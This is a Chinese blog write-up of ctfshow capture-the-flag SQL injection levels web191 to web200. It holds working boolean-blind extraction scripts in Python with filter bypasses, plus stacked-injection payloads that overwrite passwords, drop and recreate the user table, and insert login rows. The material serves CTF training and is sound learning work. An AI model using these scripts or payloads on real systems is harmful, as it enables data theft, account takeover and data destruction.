SQL注入篇4(web191-200)

已于 2024-10-03 17:37:12 修改
阅读量534 收藏 4
点赞数 16
分类专栏: ctfshow web刷题记录 文章标签: sql 数据库 python web 网络安全
于 2024-10-03 17:34:53 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_72929232/article/details/142693809
版权

一.布尔盲注(web191-194)

1.web191

过滤了ascii,web190的脚本换成ord

import requests
import string
url = "http://bee185bc-aa53-46a6-9ade-76a7b6feface.challenge.ctf.show/api/index.php"
out = ''
for j in range(1, 50):
    print(j)
    for k in range(32, 128):
        #猜解数据库名
        # data={
        #     'username': f"0'||if(ord(substr(database(),{j},1))={k},1,0)#",
        #     'password': '1'
        # }
 
        # 猜解表名
        # data={
        #     'username': f"0'||if(ord(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{j},1))={k},1,0)#",
        #     'password': '1'
        # }
 
        # 猜解列名
        # data={
        #     'username': f"0'||if(ord(substr((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_fl0g'),{j},1))={k},1,0)#",
        #     'password': '1'
        # }
 
        #猜解 flag
        data = {
            'username': f"0'||if(ord(substr((select f1ag from ctfshow_fl0g),{j},1))={k},1,0)#",
            #这部分是 'username' 的值,它使用了Python的格式化字符串(f-string)。
            #格式化字符串允许你在字符串中插入变量或表达式的值。   
            'password': '1'
        }
 
        re = requests.post(url, data=data)
        if("\\u5bc6\\u7801\\u9519\\u8bef" in re.text):
            out += chr(k)
            print(out)
            break

2.web192

ascii 和 ord 都过滤了,那么就不再转 ASCII 值,直接判断字符:

import requests
 
url = "http://10f7cee5-a9af-4875-b2af-89435301cfc4.challenge.ctf.show/api/index.php"
out = ''
dic = '{-}0123456789abcdefghijklmnopqrstuvwxyz'
for j in range(1, 50):
    print(j)
    for k in dic:
        #猜解数据库名
        # data={
        #     'username': f"0'||if(substr(database(),{j},1)={k},1,0)#",
        #     'password': '1'
        # }
 
        # 猜解表名
        # data={
        #     'username': f"0'||if(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{j},1)={k},1,0)#",
        #     'password': '1'
        # }
 
        # 猜解列名
        # data={
        #     'username': f"0'||if(substr((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_fl0g'),{j},1)={k},1,0)#",
        #     'password': '1'
        # }
 
        #猜解 flag
        data = {
            'username': f"0'||if(substr((select f1ag from ctfshow_fl0g),{j},1)='{k}',1,0)#",
            'password': '1'
        }
        re = requests.post(url, data=data)
        if("\\u5bc6\\u7801\\u9519\\u8bef" in re.text):
            out += k
            print(out)
            break

3.web193

新增过滤 substr,使用 mid 代替:

mid() 函数用于从文本字段中提取字符;

或用left 和right函数

ctfshow-web入门-sql注入(web191-web195)_ctfshow web195-CSDN博客

import requests
 
url = "http://cc4bf7a0-f3f6-4ef8-b851-13f206b936a6.challenge.ctf.show/api/index.php"
out = ''
dic = '{-}0123456789abcdefghijklmnopqrstuvwxyz_'
for j in range(1, 50):
    print(j)
    for k in dic:
        # 查数据库名
        # data = {
        #     'username': f"0'||if(mid(database(),{j},1)='{k}',1,0)#",
        #     'password': '1'
        # }
 
        # 查表名
        # data = {
        #     'username': f"0'||if((mid((select group_concat(table_name)from information_schema.tables where table_schema='ctfshow_web'),{j},1))='{k}',1,0)#",
        #     'password': '1'
        # }
 
        # 查列名
        # data = {
        #     'username': f"0'||if((mid((select group_concat(column_name) from information_schema.columns where table_schema='ctfshow_web' and table_name='ctfshow_flxg'),{j},1))='{k}',1,0)#",
        #     'password': '1'
        # }
 
        # 查具体字段
        data = {
            'username': f"0'||if((mid((select f1ag from ctfshow_flxg),{j},1))='{k}',1,0)#",
            'password': '1'
        }
        re = requests.post(url, data=data)
        if("\\u5bc6\\u7801\\u9519\\u8bef" in re.text):
            out += k
            print(out)
            break

4.web194

可用web193的脚本

二.堆叠注入:web195-web200

1.web195

密码只能是数字,过滤了空格,采用反引号包裹绕过,题目已经说了是堆叠注入,这里直接修改用户名和密码:

0;update`ctfshow_user`set`pass`=1

2.web196

1;select(1)

其中 $row[0] 表示从数据库查询结果中提取的某一行的第一个字段值,我们可以使用 select 来设置 $row[0] 的值,再提交我们设置的 password 满足两者相等;还是堆叠注入,显示过滤了 select 但可以绕过

第一个数字写什么都行 

3.web197

用户名是

1;show tables(用于显示数据库中存在的所有表)

密码为ctfshow_user,或者

1;drop table ctfshow_user;create table ctfshow_user(`username` varchar(100),`pass` varchar(100));insert ctfshow_user(`username`,`pass`) value(1,1)

4.web198-200

Web198-200都可以用show tables  

Web198还可以1;insert ctfshow_user(`username`,`pass`) value(1,1)执行后使用 1 和 1 进行登录:覆盖成功

影杀~
关注
专栏目录
GeoServer SQL注入漏洞复现(CVE-2023-25157)
0xSec
06-09 7631
GeoServer在预览图层的时候,可以对图层进行数据过滤从而渲染出指定位置的图层。由于未对用户输入进行过滤,在使用需要以数据库作为数据存储的功能时,攻击者可以构造畸形的过滤语法,绕过GeoServer的词法解析从而造成SQL注入,获取服务器中的敏感信息,甚至可能获取数据库服务器权限。
web安全sql注入——sqls-labs的安装和注入
m0_68167825的博客
06-10 1977
我们在刚学习 SQL 注入的时候,往往都需要一个能 SQL 注入的网站进行 SQL 注入学习。如果直接去网上寻找存在 SQL 注入的网站对新手来说有些难度,因此我们一般都是在本地搭建一个能 SQL 注入测试的网站。这里就来讲解一下 SQLi-Labs 的下载,安装,搭建教程。注意: mysql 版本一定要设置成 php5 以上,php5 以上才有 information_schema 库。SQLi-Labs 是一个专业的 SQL 注入练习平台,它适用于 GET 和 POST 等多场景的注入。使用 phpSt
sql注入详解
热门推荐
内心不种满鲜花就会长满杂草
05-05 21万+
SQL注入SQL Injection)是一种常见的Web安全漏洞,主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。 从而导致数据库受损(被脱库、被删除、甚至整个服务器权限陷)。 即:注入产生的原因是后台服务器接收相关参数未经过滤直接带入数据库查询...
WEB安全-SQL注入
weixin_56319791的博客
09-16 1965
SQL注入漏洞
ctf-web-sql注入
god_001的博客
05-03 1万+
题目链接:跳转提示 打开网页,一个登陆页面,根据题是本题题型是基于布尔的SQL盲注 首先在用户名处输入admin 得到结果: 即密码确为admin,而如果不输入用户名直接输入密码,发现报错 可见后台是先判断用户名是否正确存在,当用户名正确后再判断密码是否正确。 经测试发现,当出现'空格符','=','and'等字符时,发现会报错显示:‘illegal character’,即知道这些字符会被过滤,可以用括号来避免空格符的使用,用<>(大于或小于)来避免'='的使用 尝试输入
CTFshow sql注入(web171-220)
Kradress的博客
03-18 7250
目录前言题目web 171(万能密码)web 172(回显内容过滤,base64或者hex编码绕过)web 173(回显内容过滤,base64或者hex编码绕过)web 174 (盲注)总结 前言 师傅们加油!!! 题目 web 171(万能密码) //拼接sql语句查找指定ID用户 $sql = "select username,password from user where username !='flag' and id = '".$_GET['id']."' limit 1;"; id存在注
Web安全----SQL注入
m0_49420271的博客
11-27 2136
时至今日,SQL注入仍是广大渗透爱好者聚焦的攻击方式,每四年更新一次的OWASP TOP 10【链接:link】都能够看到它的身影。今天,很荣幸和大家一起来探讨研究学习SQL注入的一些内容,如有不合适或者不正确的地方,欢迎大家留言。
CTFshow sql注入(web221-253)
Kradress的博客
04-20 4774
目录前言思路题解总结 前言 输入源码 思路 ################################ 题解 ################################ 总结 …
SQL注入漏洞扫描---sqlmap
嘿嘿嘿
05-03 3081
数据库--数据表---字段---字段内容一站式识别
SQL注入练习--sqli-labs
qq_46263951的博客
02-12 2798
前言 SQL注入是比较常见的漏洞,有数据库的地方就可能存在SQL注入,所以学好SQL注入是非常有必要的,sqli-labs是一个不错的练习靶场。推荐一文章SQL注入之Mysql注入姿势及绕过总结 前置知识 注入流程 判断是否存在注入,注入是字符型还是数字型,闭合情况,绕过方式 ?id=1' ?id=1" ?id=1') ?id=1") ?id=1' or 1# ?id=1' or 0# ?id=1' or 1=1# ?id=1' and 1=2# ?id=1' and sleep(5)# ?id=
超级SQL注入工具-web-sql
10-28
超级SQL注入工具是一款基于HTTP协议自组包的SQL注入工具,支持出现在HTTP协议任意位置的SQL注入,支持各种类型的SQL注入 支持Bool型盲注、错误显示注入、Union注入,支持Access、MySQL5以上版本、SQLServer、Oracle...
SQL注入-初入web安全-详细知识图谱
11-06
SQL注入初入Web安全详细知识图谱 SQL注入是一种常见的Web应用安全漏洞,指的是攻击者通过构造特殊的输入参数,来改变原始的SQL语句,使得数据库服务器执行恶意的SQL语句,从而达到非法访问或控制数据库的目的。SQL...
毕业设计_基于springboot+layui+mybatisPlus的中小型仓库物流管理系统源码+SQL+教程+可运行】41004
最新发布
pingguocu3的博客
10-04 724
毕业设计--课程设计--springboot--java 登录管理员账号:system 密码:123456 验证码输入:注意验证码字母要大写。启动项目后运行http://locahost:8080跳转到登录界面即可。后端:springboot、mybatis-plus、shiro。application.yml文件中的数据库连接信息。运行sql目录下的warehouse.sql文件。1.基础管理:商品管理、客户管理、供应商管理;2.物流管理:进货管理、发货管理、交付管理...
PostgreSQL的表碎片
文牧之的博客
09-29 531
表碎片化是指表数据在文件系统中的不连续存储,导致读取和写入操作的效率降低。频繁的插入和删除:导致数据块中出现“空洞”。更新操作:由于 PostgreSQL 的 MVCC(多版本并发控制)机制,更新操作会生成新的行版本,原来的空间会被标记为可重用但是不立即回收。
PostgreSQL 字段使用pglz压缩测试
文牧之的博客
09-30 533
创建测试表1,并插入1000w行数据–创建测试表2,使用 pglz压缩字段,并插入1000w行数据对比表yewu1.test1和yewu1.test2的大小,没体现出压缩了。
PostgreSQL常用数值处理函数简介
lunan的博客
10-04 376
这些数值处理函数提供了丰富的数值计算功能,从简单的数学操作到更高级的科学计算,满足了大多数数据库操作中的数值处理需求。
SQL中基本SELECT语句及常见关键字的使用(内连接,左/右连接)
qq_43800449的博客
09-29 954
DDL(Data Definition Languages)语句:数据定义语言,这些语句定义了不同的数据段、数据库、表、列、索引等数据库对象的定义。常用的语句关键字主要包括 create 、 drop 、 alter 、create等。DML(Data Manipulation Language)语句:数据操纵语句,用于添加、删除、更新和查询数据库记录(增删改查),并检查数据完整性,常用的语句关键字主要包括 insert 、 delete 、 update 等。
PostgreSQL 17新特性merge语法增强
zxrhhm的博客
09-27 624
merge语法增强,支持 RETURNING 子句,可以返回新增、更新或者删除的数据行
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值